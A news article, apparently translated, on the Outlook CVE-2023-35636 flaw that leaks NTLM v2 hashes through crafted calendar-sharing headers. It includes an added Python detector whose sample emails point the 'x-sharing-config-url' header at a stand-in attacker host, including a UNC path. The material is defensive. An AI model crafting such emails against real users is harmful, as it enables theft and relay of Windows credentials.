I clicked on the link and lost my password: NTLM hashes have become a new prey for hackers

Brother

Varonis explained how hackers can steal your Outlook password with a single file.

A now-patched security vulnerability in Microsoft Outlook could be exploited by attackers to obtain a user's hashed NT LAN Manager (NTLM) v2 credentials when the user opened a specially crafted file.

NTLM v2 is a protocol used to authenticate users to remote servers. A user's NTLM v2 password hash is valuable to attackers: they can either brute-force it offline to recover the plaintext password, or use the hash to authenticate directly.

The issue, tracked as CVE-2023-35636 (CVSS score: 6.5), was fixed by Microsoft as part of an unscheduled security update in December 2023. According to a statement from Microsoft, the flaw works as follows:
  • in an email attack scenario, a cybercriminal can take advantage of the vulnerability by sending a specially crafted file to the user and convincing them to open the file;
  • in a web attack scenario, an attacker can host a website (or use a compromised website that accepts or hosts user-provided content) containing a specially crafted file designed to exploit the vulnerability.

In other words, the attacker needs to convince the victim to click on a link embedded in a phishing email or sent via a message, and then trick them into opening the corresponding file.

CVE-2023-35636 affects Outlook's calendar sharing feature. A malicious email is built by inserting two headers, "Content-Class" and "x-sharing-config-url", with specially crafted values so that the victim's NTLM hash is disclosed during authentication. The email forces Outlook to connect to the attacker's server and hand it the NTLM v2 hash as part of the authentication exchange.
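The two headers named above are also what a mail gateway or incident responder can key on. The following is an added triage example, not Varonis code or anything from the original write-up: it parses .eml messages, checks whether both "Content-Class" and "x-sharing-config-url" are present, and flags the message when the sharing URL points at a host outside an assumed allowlist of internal sharing servers (the `TRUSTED_HOSTS` set, the header values and all sample messages are constructed for the example; the detection keys on header presence and target host, not on any particular header value).

```python
"""Heuristic triage of .eml files for the Outlook calendar-sharing headers
described in the CVE-2023-35636 write-up.

Added example, not code from Varonis or Microsoft. TRUSTED_HOSTS, the header
values and the sample messages below are constructed for illustration.
"""
from email import policy
from email.parser import BytesParser
from urllib.parse import urlparse

# Assumed allowlist: hosts the organisation legitimately shares calendars from.
TRUSTED_HOSTS = {"mail.example-corp.internal", "sharing.example-corp.internal"}


def sharing_target_host(value: str) -> str:
    """Return the host an x-sharing-config-url value would make Outlook contact.

    Handles http(s) URLs and UNC-style paths (\\\\host\\share); anything else
    yields an empty string, which the caller treats as suspicious.
    """
    value = str(value).strip()
    if value.startswith("\\\\"):
        # UNC path: \\host\share\file -> host
        return value.lstrip("\\").split("\\", 1)[0].lower()
    return (urlparse(value).hostname or "").lower()


def assess_message(raw: bytes) -> dict:
    """Parse one raw message and decide whether it warrants a closer look."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    content_class = msg.get("Content-Class")          # header lookup is case-insensitive
    sharing_url = msg.get("x-sharing-config-url")
    result = {
        "subject": str(msg.get("Subject", "")),
        "has_sharing_headers": content_class is not None and sharing_url is not None,
        "target_host": None,
        "suspicious": False,
        "reason": "",
    }
    if not result["has_sharing_headers"]:
        return result                                   # ordinary mail: nothing to check
    host = sharing_target_host(sharing_url)
    result["target_host"] = host
    if not host:
        result["suspicious"] = True
        result["reason"] = "sharing URL has no parseable host"
    elif host not in TRUSTED_HOSTS:
        result["suspicious"] = True
        result["reason"] = f"sharing URL points to untrusted host {host}"
    return result


def suspicious_subjects(messages) -> list:
    """Subjects of all messages the heuristic flags, in input order."""
    return [r["subject"] for r in map(assess_message, messages) if r["suspicious"]]


# Constructed sample messages (no real addresses or hosts; .invalid / .internal TLDs).
BENIGN = b"""From: alice@example-corp.internal
Subject: Lunch

See you at noon.
"""

INTERNAL_SHARE = b"""From: alice@example-corp.internal
Subject: Shared calendar
Content-Class: placeholder-sharing-class
x-sharing-config-url: https://sharing.example-corp.internal/calendar/alice

Here is my calendar.
"""

EXTERNAL_SHARE = b"""From: someone@external.invalid
Subject: Please review my calendar
Content-Class: placeholder-sharing-class
x-sharing-config-url: https://attacker-controlled.invalid/share

Open to view.
"""

UNC_SHARE = b"""From: someone@external.invalid
Subject: Calendar update
Content-Class: placeholder-sharing-class
x-sharing-config-url: \\\\attacker-controlled.invalid\\share\\cfg

Open to view.
"""

if __name__ == "__main__":
    for r in map(assess_message, [BENIGN, INTERNAL_SHARE, EXTERNAL_SHARE, UNC_SHARE]):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['subject']!r} {r['reason']}")
```

The allowlist approach is deliberate: a sharing header pointing at an internal server is normal Outlook behaviour, so the signal is the combination of the header pair with an external or unparseable destination, which is exactly the condition under which Outlook would send an NTLM v2 response to a server the organisation does not control.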

Varonis security researcher Dolev Thaler, who is credited with discovering and reporting the bug, said that NTLM hashes can also leak through Windows Performance Analyzer (WPA) and Windows Explorer. However, these two attack methods remain unpatched.

Thaler noted that WPA attempts to authenticate using NTLM v2 over an open network. Normally, NTLM v2 is meant for authenticating to internal services addressed by IP. When an NTLM v2 hash instead travels over the open Internet, it is exposed to relay attacks and offline brute-force attacks.

This incident is a reminder for individuals and organizations alike to remain vigilant, keep software updated, and treat unexpected emails and files with caution. It also underlines the need for sound security protocols and continuous monitoring so that such vulnerabilities are detected and remediated promptly.